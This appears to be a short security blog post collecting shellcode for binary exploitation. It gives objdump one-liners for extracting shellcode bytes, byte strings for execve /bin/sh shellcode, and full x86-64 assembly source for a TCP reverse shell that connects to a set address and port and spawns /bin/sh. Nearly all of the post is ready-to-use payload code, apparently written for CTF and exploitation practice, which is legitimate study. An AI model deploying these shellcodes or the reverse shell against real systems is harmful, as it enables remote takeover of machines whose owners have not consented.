Shellcodes for Binary Exploitation

 

Get shellcode of the binary using objdump 

objdump -d ./Exit.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Output: "\x48\x31\xc0\xb0\x3c\x48\x31\xff\x0f\x05"

for i in $(objdump -d Exit.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo
Execve

"\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
/bin/sh 

"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
X86/64-bit TCP Reverse Shell 

#Compile and get Shellcode
nasm -f elf64 stack.nasm -o stack.o
objdump -M intel -D stack.o
ld stack.o -o stack
for i in $(objdump -D ./rev |grep "^ " |cut -f2); do echo -n '\x'$i; done; echo

$Shell starts here

section .text
global _start

_start: 

; clearing rax, rdi, rsi, rdx
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx

;socket
add rax, 41 ;syscall number for socket
add rdi, 2
add rsi, 1
syscall

mov rdi, rax

; preparing structure for connect
; IP - 127.1.1.1 - 0x0101017F; 1 - 01, 127 -7F
push 0x0100007f
; Port 9999 - 270F - 0x0f27
; Port 4444 - 115c - 0x5c11
push word 0x5c11
push word 0x2

;connect
mov rsi, rsp
add rdx, 0x10
xor rax, rax
add rax, 42
syscall

xor rsi, rsi
add rsi, 2
loop:
		xor rax, rax
		add rax, 33
		syscall
		dec rsi
		jns loop

;execve
xor rax, rax
mov rdx, rax    ; NULL for argument 3
mov rsi, rdx     ;NULL for argument 2

push rax
mov rbx, 0x68732f6e69622f2f
push rbx
mov rdi, rsp

add rax, 59
syscall




Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment